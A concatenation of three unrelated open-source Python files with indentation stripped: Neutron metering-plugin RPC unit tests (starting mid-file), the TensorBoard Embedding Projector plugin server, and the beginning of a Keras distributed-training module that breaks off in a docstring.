set_context=True):
self.mock_uuid.return_value = self.uuid
with self.router(name='router1', tenant_id=self.tenant_id,
set_context=True):
with self.metering_label(tenant_id=self.tenant_id,
set_context=True):
self.mock_fanout.assert_called_with(self.ctx, expected,
topic=self.topic)
def test_remove_metering_label_rpc_call(self):
expected = {'args':
{'routers': [{'status': 'ACTIVE',
'name': 'router1',
'gw_port_id': None,
'admin_state_up': True,
'tenant_id': self.tenant_id,
'_metering_labels': [
{'rules': [],
'id': self.uuid}],
'id': self.uuid}]},
'namespace': None,
'method': 'add_metering_label'}
with self.router(tenant_id=self.tenant_id, set_context=True):
with self.metering_label(tenant_id=self.tenant_id,
set_context=True):
self.mock_fanout.assert_called_with(self.ctx, expected,
topic=self.topic)
expected['method'] = 'remove_metering_label'
self.mock_fanout.assert_called_with(self.ctx, expected,
topic=self.topic)
def test_remove_one_metering_label_rpc_call(self):
second_uuid = 'e27fe2df-376e-4ac7-ae13-92f050a21f84'
expected_add = {'args':
{'routers': [{'status': 'ACTIVE',
'name': 'router1',
'gw_port_id': None,
'admin_state_up': True,
'tenant_id': self.tenant_id,
'_metering_labels': [
{'rules': [],
'id': self.uuid},
{'rules': [],
'id': second_uuid}],
'id': self.uuid}]},
'namespace': None,
'method': 'add_metering_label'}
expected_remove = {'args':
{'routers': [{'status': 'ACTIVE',
'name': 'router1',
'gw_port_id': None,
'admin_state_up': True,
'tenant_id': self.tenant_id,
'_metering_labels': [
{'rules': [],
'id': second_uuid}],
'id': self.uuid}]},
'namespace': None,
'method': 'remove_metering_label'}
with self.router(tenant_id=self.tenant_id, set_context=True):
with self.metering_label(tenant_id=self.tenant_id,
set_context=True):
self.mock_uuid.return_value = second_uuid
with self.metering_label(tenant_id=self.tenant_id,
set_context=True):
self.mock_fanout.assert_called_with(self.ctx, expected_add,
topic=self.topic)
self.mock_fanout.assert_called_with(self.ctx, expected_remove,
topic=self.topic)
def test_update_metering_label_rules_rpc_call(self):
second_uuid = 'e27fe2df-376e-4ac7-ae13-92f050a21f84'
expected_add = {'args':
{'routers': [
{'status': 'ACTIVE',
'name': 'router1',
'gw_port_id': None,
'admin_state_up': True,
'tenant_id': self.tenant_id,
'_metering_labels': [
{'rules': [
{'remote_ip_prefix': '10.0.0.0/24',
'direction': 'ingress',
'metering_label_id': self.uuid,
'excluded': False,
'id': self.uuid},
{'remote_ip_prefix': '10.0.0.0/24',
'direction': 'egress',
'metering_label_id': self.uuid,
'excluded': False,
'id': second_uuid}],
'id': self.uuid}],
'id': self.uuid}]},
'namespace': None,
'method': 'update_metering_label_rules'}
expected_del = {'args':
{'routers': [
{'status': 'ACTIVE',
'name': 'router1',
'gw_port_id': None,
'admin_state_up': True,
'tenant_id': self.tenant_id,
'_metering_labels': [
{'rules': [
{'remote_ip_prefix': '10.0.0.0/24',
'direction': 'ingress',
'metering_label_id': self.uuid,
'excluded': False,
'id': self.uuid}],
'id': self.uuid}],
'id': self.uuid}]},
'namespace': None,
'method': 'update_metering_label_rules'}
with self.router(tenant_id=self.tenant_id, set_context=True):
with self.metering_label(tenant_id=self.tenant_id,
set_context=True) as label:
l = label['metering_label']
with self.metering_label_rule(l['id']):
self.mock_uuid.return_value = second_uuid
with self.metering_label_rule(l['id'], direction='egress'):
self.mock_fanout.assert_called_with(self.ctx,
expected_add,
topic=self.topic)
self.mock_fanout.assert_called_with(self.ctx,
expected_del,
topic=self.topic)
def test_delete_metering_label_does_not_clear_router_tenant_id(self):
tenant_id = '654f6b9d-0f36-4ae5-bd1b-01616794ca60'
with self.metering_label(tenant_id=tenant_id,
no_delete=True) as metering_label:
with self.router(tenant_id=tenant_id, set_context=True) as r:
router = self._show('routers', r['router']['id'])
self.assertEqual(tenant_id, router['router']['tenant_id'])
metering_label_id = metering_label['metering_label']['id']
self._delete('metering-labels', metering_label_id, 204)
router = self._show('routers', r['router']['id'])
self.assertEqual(tenant_id, router['router']['tenant_id'])
class TestMeteringPluginL3AgentScheduler(
l3_agentschedulers_db.L3AgentSchedulerDbMixin,
test_db_plugin.NeutronDbPluginV2TestCase,
test_l3_plugin.L3NatTestCaseMixin,
test_db_metering.MeteringPluginDbTestCaseMixin):
resource_prefix_map = dict(
(k.replace('_', '-'), constants.COMMON_PREFIXES[constants.METERING])
for k in ext_metering.RESOURCE_ATTRIBUTE_MAP.keys()
)
def setUp(self, plugin_str=None, service_plugins=None, scheduler=None):
if not plugin_str:
plugin_str = ('neutron.tests.unit.test_l3_plugin.'
'TestL3NatIntAgentSchedulingPlugin')
if not service_plugins:
service_plugins = {'metering_plugin_name':
METERING_SERVICE_PLUGIN_KLASS}
if not scheduler:
scheduler = plugin_str
ext_mgr = MeteringTestExtensionManager()
super(TestMeteringPluginL3AgentScheduler,
self).setUp(plugin=plugin_str, ext_mgr=ext_mgr,
service_plugins=service_plugins)
self.uuid = '654f6b9d-0f36-4ae5-bd1b-01616794ca60'
uuid = 'neutron.openstack.common.uuidutils.generate_uuid'
self.uuid_patch = mock.patch(uuid, return_value=self.uuid)
self.mock_uuid = self.uuid_patch.start()
cast = 'neutron.common.rpc_compat.RpcProxy.cast'
self.cast_patch = mock.patch(cast)
self.mock_cast = self.cast_patch.start()
self.tenant_id = 'a7e61382-47b8-4d40-bae3-f95981b5637b'
self.ctx = context.Context('', self.tenant_id, is_admin=True)
self.context_patch = mock.patch('neutron.context.Context',
return_value=self.ctx)
self.mock_context = self.context_patch.start()
self.l3routers_patch = mock.patch(scheduler +
'.get_l3_agents_hosting_routers')
self.l3routers_mock = self.l3routers_patch.start()
self.topic = 'metering_agent'
def test_add_metering_label_rpc_call(self):
second_uuid = 'e27fe2df-376e-4ac7-ae13-92f050a21f84'
expected1 = {'args': {'routers': [{'status': 'ACTIVE',
'name': 'router1',
'gw_port_id': None,
'admin_state_up': True,
'tenant_id': self.tenant_id,
'_metering_labels': [
{'rules': [],
'id': second_uuid}],
'id': self.uuid}]},
'namespace': None,
'method': 'add_metering_label'}
expected2 = {'args': {'routers': [{'status': 'ACTIVE',
'name': 'router2',
'gw_port_id': None,
'admin_state_up': True,
'tenant_id': self.tenant_id,
'_metering_labels': [
{'rules': [],
'id': second_uuid}],
'id': second_uuid}]},
'namespace': None,
'method': 'add_metering_label'}
# bind each router to a specific agent
agent1 = agents_db.Agent(host='agent1')
agent2 = agents_db.Agent(host='agent2')
agents = {self.uuid: agent1,
second_uuid: agent2}
def side_effect(context, routers, admin_state_up, active):
return [agents[routers[0]]]
self.l3routers_mock.side_effect = side_effect
with self.router(name='router1', tenant_id=self.tenant_id,
set_context=True):
self.mock_uuid.return_value = second_uuid
with self.router(name='router2', tenant_id=self.tenant_id,
set_context=True):
with self.metering_label(tenant_id=self.tenant_id,
set_context=True):
topic1 = "%s.%s" % (self.topic, 'agent1')
topic2 = "%s.%s" % (self.topic, 'agent2')
# check if there is a call per agent
expected = [mock.call(self.ctx, expected1, topic=topic1),
mock.call(self.ctx, expected2, topic=topic2)]
self.mock_cast.assert_has_calls(expected, any_order=True)
class TestMeteringPluginL3AgentSchedulerServicePlugin(
TestMeteringPluginL3AgentScheduler):
"""Unit tests for the case where separate service plugin
implements L3 routing.
"""
def setUp(self):
l3_plugin = ('neutron.tests.unit.test_l3_plugin.'
'TestL3NatAgentSchedulingServicePlugin')
service_plugins = {'metering_plugin_name':
METERING_SERVICE_PLUGIN_KLASS,
'l3_plugin_name': l3_plugin}
plugin_str = ('neutron.tests.unit.test_l3_plugin.'
'TestNoL3NatPlugin')
super(TestMeteringPluginL3AgentSchedulerServicePlugin, self).setUp(
plugin_str=plugin_str, service_plugins=service_plugins,
scheduler=l3_plugin)
class TestMeteringPluginRpcFromL3Agent(
test_db_plugin.NeutronDbPluginV2TestCase,
test_l3_plugin.L3NatTestCaseMixin,
test_db_metering.MeteringPluginDbTestCaseMixin):
resource_prefix_map = dict(
(k.replace('_', '-'), constants.COMMON_PREFIXES[constants.METERING])
for k in ext_metering.RESOURCE_ATTRIBUTE_MAP
)
def setUp(self):
service_plugins = {'metering_plugin_name':
METERING_SERVICE_PLUGIN_KLASS}
plugin = ('neutron.tests.unit.test_l3_plugin.'
'TestL3NatIntAgentSchedulingPlugin')
ext_mgr = MeteringTestExtensionManager()
super(TestMeteringPluginRpcFromL3Agent,
self).setUp(plugin=plugin, service_plugins=service_plugins,
ext_mgr=ext_mgr)
self.meter_plugin = manager.NeutronManager.get_service_plugins().get(
constants.METERING)
self.adminContext = context.get_admin_context()
self._register_l3_agent('agent1')
def _register_l3_agent(self, host):
agent = {
'binary': 'neutron-l3-agent',
'host': host,
'topic': topics.L3_AGENT,
'configurations': {},
'agent_type': n_constants.AGENT_TYPE_L3,
'start_flag': True
}
callback = agents_db.AgentExtRpcCallback()
callback.report_state(self.adminContext,
agent_state={'agent_state': agent},
time=timeutils.strtime())
def test_get_sync_data_metering(self):
with self.subnet() as subnet:
s = subnet['subnet']
self._set_net_external(s['network_id'])
with self.router(name='router1', subnet=subnet) as router:
r = router['router']
self._add_external_gateway_to_router(r['id'], s['network_id'])
with self.metering_label(tenant_id=r['tenant_id']):
callbacks = metering_rpc.MeteringRpcCallbacks(
self.meter_plugin)
data = callbacks.get_sync_data_metering(self.adminContext,
host='agent1')
self.assertEqual('router1', data[0]['name'])
self._register_l3_agent('agent2')
data = callbacks.get_sync_data_metering(self.adminContext,
host='agent2')
self.assertFalse(data)
self._remove_external_gateway_from_router(
r['id'], s['network_id'])
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""The Embedding Projector plugin."""
import collections
import functools
import imghdr
import mimetypes
import os
import threading
import numpy as np
from werkzeug import wrappers
from google.protobuf import json_format
from google.protobuf import text_format
from tensorboard import context
from tensorboard.backend.event_processing import plugin_asset_util
from tensorboard.backend.http_util import Respond
from tensorboard.compat import tf
from tensorboard.plugins import base_plugin
from tensorboard.plugins.projector import metadata
from tensorboard.plugins.projector.projector_config_pb2 import ProjectorConfig
from tensorboard.util import tb_logging
logger = tb_logging.get_logger()
# Number of tensors in the LRU cache.
_TENSOR_CACHE_CAPACITY = 1
# HTTP routes.
CONFIG_ROUTE = "/info"
TENSOR_ROUTE = "/tensor"
METADATA_ROUTE = "/metadata"
RUNS_ROUTE = "/runs"
BOOKMARKS_ROUTE = "/bookmarks"
SPRITE_IMAGE_ROUTE = "/sprite_image"
_IMGHDR_TO_MIMETYPE = {
"bmp": "image/bmp",
"gif": "image/gif",
"jpeg": "image/jpeg",
"png": "image/png",
}
_DEFAULT_IMAGE_MIMETYPE = "application/octet-stream"
class LRUCache(object):
"""LRU cache.
Used for storing the last used tensor.
"""
def __init__(self, size):
if size < 1:
raise ValueError("The cache size must be >=1")
self._size = size
self._dict = collections.OrderedDict()
def get(self, key):
try:
value = self._dict.pop(key)
self._dict[key] = value
return value
except KeyError:
return None
def set(self, key, value):
if value is None:
raise ValueError("value must be != None")
try:
self._dict.pop(key)
except KeyError:
if len(self._dict) >= self._size:
self._dict.popitem(last=False)
self._dict[key] = value
class EmbeddingMetadata(object):
"""Metadata container for an embedding.
The metadata holds different columns with values used for
visualization (color by, label by) in the "Embeddings" tab in
TensorBoard.
"""
def __init__(self, num_points):
"""Constructs a metadata for an embedding of the specified size.
Args:
num_points: Number of points in the embedding.
"""
self.num_points = num_points
self.column_names = []
self.name_to_values = {}
def add_column(self, column_name, column_values):
"""Adds a named column of metadata values.
Args:
column_name: Name of the column.
column_values: 1D array/list/iterable holding the column values. Must be
of length `num_points`. The i-th value corresponds to the i-th point.
Raises:
ValueError: If `column_values` is not 1D array, or of length `num_points`,
or the `name` is already used.
"""
# Sanity checks.
if isinstance(column_values, list) and isinstance(
column_values[0], list
):
raise ValueError(
'"column_values" must be a flat list, but we detected '
"that its first entry is a list"
)
if isinstance(column_values, np.ndarray) and column_values.ndim != 1:
raise ValueError(
'"column_values" should be of rank 1, '
"but is of rank %d" % column_values.ndim
)
if len(column_values) != self.num_points:
raise ValueError(
'"column_values" should be of length %d, but is of '
"length %d" % (self.num_points, len(column_values))
)
if column_name in self.name_to_values:
raise ValueError(
'The column name "%s" is already used' % column_name
)
self.column_names.append(column_name)
self.name_to_values[column_name] = column_values
def _read_tensor_tsv_file(fpath):
with tf.io.gfile.GFile(fpath, "r") as f:
tensor = []
for line in f:
line = line.rstrip("\n")
if line:
tensor.append(list(map(float, line.split("\t"))))
return np.array(tensor, dtype="float32")
def _read_tensor_binary_file(fpath, shape):
if len(shape) != 2:
raise ValueError("Tensor must be 2D, got shape {}".format(shape))
tensor = np.fromfile(fpath, dtype="float32")
return tensor.reshape(shape)
def _assets_dir_to_logdir(assets_dir):
sub_path = os.path.sep + metadata.PLUGINS_DIR + os.path.sep
if sub_path in assets_dir:
two_parents_up = os.pardir + os.path.sep + os.pardir
return os.path.abspath(os.path.join(assets_dir, two_parents_up))
return assets_dir
def _latest_checkpoints_changed(configs, run_path_pairs):
"""Returns true if the latest checkpoint has changed in any of the runs."""
for run_name, assets_dir in run_path_pairs:
if run_name not in configs:
config = ProjectorConfig()
config_fpath = os.path.join(assets_dir, metadata.PROJECTOR_FILENAME)
if tf.io.gfile.exists(config_fpath):
with tf.io.gfile.GFile(config_fpath, "r") as f:
file_content = f.read()
text_format.Merge(file_content, config)
else:
config = configs[run_name]
# See if you can find a checkpoint file in the logdir.
logdir = _assets_dir_to_logdir(assets_dir)
ckpt_path = _find_latest_checkpoint(logdir)
if not ckpt_path:
continue
if config.model_checkpoint_path != ckpt_path:
return True
return False
def _parse_positive_int_param(request, param_name):
"""Parses and asserts a positive (>0) integer query parameter.
Args:
request: The Werkzeug Request object
param_name: Name of the parameter.
Returns:
Param, or None, or -1 if parameter is not a positive integer.
"""
param = request.args.get(param_name)
if not param:
return None
try:
param = int(param)
if param <= 0:
raise ValueError()
return param
except ValueError:
return -1
def _rel_to_abs_asset_path(fpath, config_fpath):
fpath = os.path.expanduser(fpath)
if not os.path.isabs(fpath):
return os.path.join(os.path.dirname(config_fpath), fpath)
return fpath
def _using_tf():
"""Return true if we're not using the fake TF API stub implementation."""
return tf.__version__ != "stub"
class ProjectorPlugin(base_plugin.TBPlugin):
"""Embedding projector."""
plugin_name = metadata.PLUGIN_NAME
def __init__(self, context):
"""Instantiates ProjectorPlugin via TensorBoard core.
Args:
context: A base_plugin.TBContext instance.
"""
self.data_provider = context.data_provider
self.logdir = context.logdir
self.readers = {}
self._run_paths = None
self._configs = {}
self.config_fpaths = None
self.tensor_cache = LRUCache(_TENSOR_CACHE_CAPACITY)
# Whether the plugin is active (has meaningful data to process and serve).
# Once the plugin is deemed active, we no longer re-compute the value
# because doing so is potentially expensive.
self._is_active = False
# The running thread that is currently determining whether the plugin is
# active. If such a thread exists, do not start a duplicate thread.
self._thread_for_determining_is_active = None
def get_plugin_apps(self):
asset_prefix = "tf_projector_plugin"
return {
RUNS_ROUTE: self._serve_runs,
CONFIG_ROUTE: self._serve_config,
TENSOR_ROUTE: self._serve_tensor,
METADATA_ROUTE: self._serve_metadata,
BOOKMARKS_ROUTE: self._serve_bookmarks,
SPRITE_IMAGE_ROUTE: self._serve_sprite_image,
"/index.js": functools.partial(
self._serve_file,
os.path.join(asset_prefix, "index.js"),
),
"/projector_binary.html": functools.partial(
self._serve_file,
os.path.join(asset_prefix, "projector_binary.html"),
),
"/projector_binary.js": functools.partial(
self._serve_file,
os.path.join(asset_prefix, "projector_binary.js"),
),
}
def is_active(self):
"""Determines whether this plugin is active.
This plugin is only active if any run has an embedding, and only
when running against a local log directory.
Returns:
Whether any run has embedding data to show in the projector.
"""
if not self.data_provider or not self.logdir:
return False
if self._is_active:
# We have already determined that the projector plugin should be active.
# Do not re-compute that. We have no reason to later set this plugin to be
# inactive.
return True
if self._thread_for_determining_is_active:
# We are currently determining whether the plugin is active. Do not start
# a separate thread.
return self._is_active
# The plugin is currently not active. The frontend might check again later.
# For now, spin off a separate thread to determine whether the plugin is
# active.
new_thread = threading.Thread(
target=self._determine_is_active,
name="ProjectorPluginIsActiveThread",
)
self._thread_for_determining_is_active = new_thread
new_thread.start()
return False
def frontend_metadata(self):
return base_plugin.FrontendMetadata(
es_module_path="/index.js",
disable_reload=True,
)
def _determine_is_active(self):
"""Determines whether the plugin is active.
This method is run in a separate thread so that the plugin can
offer an immediate response to whether it is active and
determine whether it should be active in a separate thread.
"""
self._update_configs()
if self._configs:
self._is_active = True
self._thread_for_determining_is_active = None
def _update_configs(self):
"""Updates `self._configs` and `self._run_paths`."""
if self.data_provider and self.logdir:
# Create a background context; we may not be in a request.
ctx = context.RequestContext()
run_paths = {
run.run_name: os.path.join(self.logdir, run.run_name)
for run in self.data_provider.list_runs(ctx, experiment_id="")
}
else:
run_paths = {}
run_paths_changed = run_paths != self._run_paths
self._run_paths = run_paths
run_path_pairs = list(self._run_paths.items())
self._append_plugin_asset_directories(run_path_pairs)
# Also accept the root logdir as a model checkpoint directory,
# so that the projector still works when there are no runs.
# (Case on `run` rather than `path` to avoid issues with
# absolute/relative paths on any filesystems.)
if "." not in self._run_paths:
run_path_pairs.append((".", self.logdir))
if run_paths_changed or _latest_checkpoints_changed(
self._configs, run_path_pairs
):
self.readers = {}
self._configs, self.config_fpaths = self._read_latest_config_files(
run_path_pairs
)
self._augment_configs_with_checkpoint_info()
def _augment_configs_with_checkpoint_info(self):
for run, config in self._configs.items():
for embedding in config.embeddings:
# Normalize the name of the embeddings.
if embedding.tensor_name.endswith(":0"):
embedding.tensor_name = embedding.tensor_name[:-2]
# Find the size of embeddings associated with a tensors file.
if embedding.tensor_path:
fpath = _rel_to_abs_asset_path(
embedding.tensor_path, self.config_fpaths[run]
)
tensor = self.tensor_cache.get((run, embedding.tensor_name))
if tensor is None:
try:
tensor = _read_tensor_tsv_file(fpath)
except UnicodeDecodeError:
tensor = _read_tensor_binary_file(
fpath, embedding.tensor_shape
)
self.tensor_cache.set(
(run, embedding.tensor_name), tensor
)
if not embedding.tensor_shape:
embedding.tensor_shape.extend(
[len(tensor), len(tensor[0])]
)
reader = self._get_reader_for_run(run)
if not reader:
continue
# Augment the configuration with the tensors in the checkpoint file.
special_embedding = None
if config.embeddings and not config.embeddings[0].tensor_name:
special_embedding = config.embeddings[0]
config.embeddings.remove(special_embedding)
var_map = reader.get_variable_to_shape_map()
for tensor_name, tensor_shape in var_map.items():
if len(tensor_shape) != 2:
continue
# Optimizer slot values are the same shape as embeddings
# but are not embeddings.
if ".OPTIMIZER_SLOT" in tensor_name:
continue
embedding = self._get_embedding(tensor_name, config)
if not embedding:
embedding = config.embeddings.add()
embedding.tensor_name = tensor_name
if special_embedding:
embedding.metadata_path = (
special_embedding.metadata_path
)
embedding.bookmarks_path = (
special_embedding.bookmarks_path
)
if not embedding.tensor_shape:
embedding.tensor_shape.extend(tensor_shape)
# Remove configs that do not have any valid (2D) tensors.
runs_to_remove = []
for run, config in self._configs.items():
if not config.embeddings:
runs_to_remove.append(run)
for run in runs_to_remove:
del self._configs[run]
del self.config_fpaths[run]
def _read_latest_config_files(self, run_path_pairs):
"""Reads and returns the projector config files in every run
directory."""
configs = {}
config_fpaths = {}
for run_name, assets_dir in run_path_pairs:
config = ProjectorConfig()
config_fpath = os.path.join(assets_dir, metadata.PROJECTOR_FILENAME)
if tf.io.gfile.exists(config_fpath):
with tf.io.gfile.GFile(config_fpath, "r") as f:
file_content = f.read()
text_format.Merge(file_content, config)
has_tensor_files = False
for embedding in config.embeddings:
if embedding.tensor_path:
if not embedding.tensor_name:
embedding.tensor_name = os.path.basename(
embedding.tensor_path
)
has_tensor_files = True
break
if not config.model_checkpoint_path:
# See if you can find a checkpoint file in the logdir.
logdir = _assets_dir_to_logdir(assets_dir)
ckpt_path = _find_latest_checkpoint(logdir)
if not ckpt_path and not has_tensor_files:
continue
if ckpt_path:
config.model_checkpoint_path = ckpt_path
# Sanity check for the checkpoint file existing.
if (
config.model_checkpoint_path
and _using_tf()
and not tf.io.gfile.glob(config.model_checkpoint_path + "*")
):
logger.warning(
'Checkpoint file "%s" not found',
config.model_checkpoint_path,
)
continue
configs[run_name] = config
config_fpaths[run_name] = config_fpath
return configs, config_fpaths
def _get_reader_for_run(self, run):
if run in self.readers:
return self.readers[run]
config = self._configs[run]
reader = None
if config.model_checkpoint_path and _using_tf():
try:
reader = tf.train.load_checkpoint(config.model_checkpoint_path)
except Exception: # pylint: disable=broad-except
logger.warning(
'Failed reading "%s"', config.model_checkpoint_path
)
self.readers[run] = reader
return reader
def _get_metadata_file_for_tensor(self, tensor_name, config):
embedding_info = self._get_embedding(tensor_name, config)
if embedding_info:
return embedding_info.metadata_path
return None
def _get_bookmarks_file_for_tensor(self, tensor_name, config):
embedding_info = self._get_embedding(tensor_name, config)
if embedding_info:
return embedding_info.bookmarks_path
return None
def _canonical_tensor_name(self, tensor_name):
if ":" not in tensor_name:
return tensor_name + ":0"
else:
return tensor_name
def _get_embedding(self, tensor_name, config):
if not config.embeddings:
return None
for info in config.embeddings:
if self._canonical_tensor_name(
info.tensor_name
) == self._canonical_tensor_name(tensor_name):
return info
return None
def _append_plugin_asset_directories(self, run_path_pairs):
extra = []
plugin_assets_name = metadata.PLUGIN_ASSETS_NAME
for (run, logdir) in run_path_pairs:
assets = plugin_asset_util.ListAssets(logdir, plugin_assets_name)
if metadata.PROJECTOR_FILENAME not in assets:
continue
assets_dir = os.path.join(
self._run_paths[run], metadata.PLUGINS_DIR, plugin_assets_name
)
assets_path_pair = (run, os.path.abspath(assets_dir))
extra.append(assets_path_pair)
run_path_pairs.extend(extra)
@wrappers.Request.application
def _serve_file(self, file_path, request):
"""Returns a resource file."""
res_path = os.path.join(os.path.dirname(__file__), file_path)
with open(res_path, "rb") as read_file:
mimetype = mimetypes.guess_type(file_path)[0]
return Respond(request, read_file.read(), content_type=mimetype)
@wrappers.Request.application
def _serve_runs(self, request):
"""Returns a list of runs that have embeddings."""
self._update_configs()
return Respond(request, list(self._configs.keys()), "application/json")
@wrappers.Request.application
def _serve_config(self, request):
run = request.args.get("run")
if run is None:
return Respond(
request, 'query parameter "run" is required', "text/plain", 400
)
self._update_configs()
config = self._configs.get(run)
if config is None:
return Respond(
request, 'Unknown run: "%s"' % run, "text/plain", 400
)
return Respond(
request, json_format.MessageToJson(config), "application/json"
)
@wrappers.Request.application
def _serve_metadata(self, request):
run = request.args.get("run")
if run is None:
return Respond(
request, 'query parameter "run" is required', "text/plain", 400
)
name = request.args.get("name")
if name is None:
return Respond(
request, 'query parameter "name" is required', "text/plain", 400
)
num_rows = _parse_positive_int_param(request, "num_rows")
if num_rows == -1:
return Respond(
request,
"query parameter num_rows must be integer > 0",
"text/plain",
400,
)
self._update_configs()
config = self._configs.get(run)
if config is None:
return Respond(
request, 'Unknown run: "%s"' % run, "text/plain", 400
)
fpath = self._get_metadata_file_for_tensor(name, config)
if not fpath:
return Respond(
request,
'No metadata file found for tensor "%s" in the config file "%s"'
% (name, self.config_fpaths[run]),
"text/plain",
400,
)
fpath = _rel_to_abs_asset_path(fpath, self.config_fpaths[run])
if not tf.io.gfile.exists(fpath) or tf.io.gfile.isdir(fpath):
return Respond(
request,
'"%s" not found, or is not a file' % fpath,
"text/plain",
400,
)
num_header_rows = 0
with tf.io.gfile.GFile(fpath, "r") as f:
lines = []
# Stream reading the file with early break in case the file doesn't fit in
# memory.
for line in f:
lines.append(line)
if len(lines) == 1 and "\t" in lines[0]:
num_header_rows = 1
if num_rows and len(lines) >= num_rows + num_header_rows:
break
return Respond(request, "".join(lines), "text/plain")
@wrappers.Request.application
def _serve_tensor(self, request):
run = request.args.get("run")
if run is None:
return Respond(
request, 'query parameter "run" is required', "text/plain", 400
)
name = request.args.get("name")
if name is None:
return Respond(
request, 'query parameter "name" is required', "text/plain", 400
)
num_rows = _parse_positive_int_param(request, "num_rows")
if num_rows == -1:
return Respond(
request,
"query parameter num_rows must be integer > 0",
"text/plain",
400,
)
self._update_configs()
config = self._configs.get(run)
if config is None:
return Respond(
request, 'Unknown run: "%s"' % run, "text/plain", 400
)
tensor = self.tensor_cache.get((run, name))
if tensor is None:
# See if there is a tensor file in the config.
embedding = self._get_embedding(name, config)
if embedding and embedding.tensor_path:
fpath = _rel_to_abs_asset_path(
embedding.tensor_path, self.config_fpaths[run]
)
if not tf.io.gfile.exists(fpath):
return Respond(
request,
'Tensor file "%s" does not exist' % fpath,
"text/plain",
400,
)
try:
tensor = _read_tensor_tsv_file(fpath)
except UnicodeDecodeError:
tensor = _read_tensor_binary_file(
fpath, embedding.tensor_shape
)
else:
reader = self._get_reader_for_run(run)
if not reader or not reader.has_tensor(name):
return Respond(
request,
'Tensor "%s" not found in checkpoint dir "%s"'
% (name, config.model_checkpoint_path),
"text/plain",
400,
)
try:
tensor = reader.get_tensor(name)
except tf.errors.InvalidArgumentError as e:
return Respond(request, str(e), "text/plain", 400)
self.tensor_cache.set((run, name), tensor)
if num_rows:
tensor = tensor[:num_rows]
if tensor.dtype != "float32":
tensor = tensor.astype(dtype="float32", copy=False)
data_bytes = tensor.tobytes()
return Respond(request, data_bytes, "application/octet-stream")
@wrappers.Request.application
def _serve_bookmarks(self, request):
run = request.args.get("run")
if not run:
return Respond(
request, 'query parameter "run" is required', "text/plain", 400
)
name = request.args.get("name")
if name is None:
return Respond(
request, 'query parameter "name" is required', "text/plain", 400
)
self._update_configs()
config = self._configs.get(run)
if config is None:
return Respond(
request, 'Unknown run: "%s"' % run, "text/plain", 400
)
fpath = self._get_bookmarks_file_for_tensor(name, config)
if not fpath:
return Respond(
request,
'No bookmarks file found for tensor "%s" in the config file "%s"'
% (name, self.config_fpaths[run]),
"text/plain",
400,
)
fpath = _rel_to_abs_asset_path(fpath, self.config_fpaths[run])
if not tf.io.gfile.exists(fpath) or tf.io.gfile.isdir(fpath):
return Respond(
request,
'"%s" not found, or is not a file' % fpath,
"text/plain",
400,
)
bookmarks_json = None
with tf.io.gfile.GFile(fpath, "rb") as f:
bookmarks_json = f.read()
return Respond(request, bookmarks_json, "application/json")
@wrappers.Request.application
def _serve_sprite_image(self, request):
run = request.args.get("run")
if not run:
return Respond(
request, 'query parameter "run" is required', "text/plain", 400
)
name = request.args.get("name")
if name is None:
return Respond(
request, 'query parameter "name" is required', "text/plain", 400
)
self._update_configs()
config = self._configs.get(run)
if config is None:
return Respond(
request, 'Unknown run: "%s"' % run, "text/plain", 400
)
embedding_info = self._get_embedding(name, config)
if not embedding_info or not embedding_info.sprite.image_path:
return Respond(
request,
'No sprite image file found for tensor "%s" in the config file "%s"'
% (name, self.config_fpaths[run]),
"text/plain",
400,
)
fpath = os.path.expanduser(embedding_info.sprite.image_path)
fpath = _rel_to_abs_asset_path(fpath, self.config_fpaths[run])
if not tf.io.gfile.exists(fpath) or tf.io.gfile.isdir(fpath):
return Respond(
request,
'"%s" does not exist or is directory' % fpath,
"text/plain",
400,
)
f = tf.io.gfile.GFile(fpath, "rb")
encoded_image_string = f.read()
f.close()
image_type = imghdr.what(None, encoded_image_string)
mime_type = _IMGHDR_TO_MIMETYPE.get(image_type, _DEFAULT_IMAGE_MIMETYPE)
return Respond(request, encoded_image_string, mime_type)
def _find_latest_checkpoint(dir_path):
if not _using_tf():
return None
try:
ckpt_path = tf.train.latest_checkpoint(dir_path)
if not ckpt_path:
# Check the parent directory.
ckpt_path = tf.train.latest_checkpoint(
os.path.join(dir_path, os.pardir)
)
return ckpt_path
except tf.errors.NotFoundError:
return None
|
|
# Copyright 2018 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Part of the Keras training engine related to distributed training.
"""
# pylint: disable=protected-access
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import enum
import numpy as np
from tensorflow.python.distribute import reduce_util as ds_reduce_util
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import tensor_shape
from tensorflow.python.keras import backend as K
from tensorflow.python.keras import callbacks as cbks
from tensorflow.python.keras import metrics as metrics_module
from tensorflow.python.keras import optimizers
from tensorflow.python.keras.engine import distributed_training_utils
from tensorflow.python.keras.utils.generic_utils import Progbar
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import distribute as distribute_lib
from tensorflow.python.util import nest
# TODO(sourabhbajaj): Check if we can merge the test and prediction graphs
class _Mode(enum.Enum):
TRAIN = 'train'
TEST = 'test'
PREDICT = 'predict'
# TODO(priyag, sourabhbajaj): Refactor this file to address code duplication.
def experimental_fit_loop(model,
iterator,
epochs=100,
verbose=1,
callbacks=None,
initial_epoch=0,
steps_per_epoch=None,
val_iterator=None,
validation_steps=None):
"""Fit loop for training with TPU DistributionStrategy.
Arguments:
model: Keras Model instance.
iterator: Iterator that returns inputs and targets
epochs: Number of times to iterate over the data
verbose: Integer, Verbosity mode, 0, 1 or 2
callbacks: List of callbacks to be called during training
initial_epoch: Epoch at which to start training
(useful for resuming a previous training run)
steps_per_epoch: Total number of steps (batches of samples)
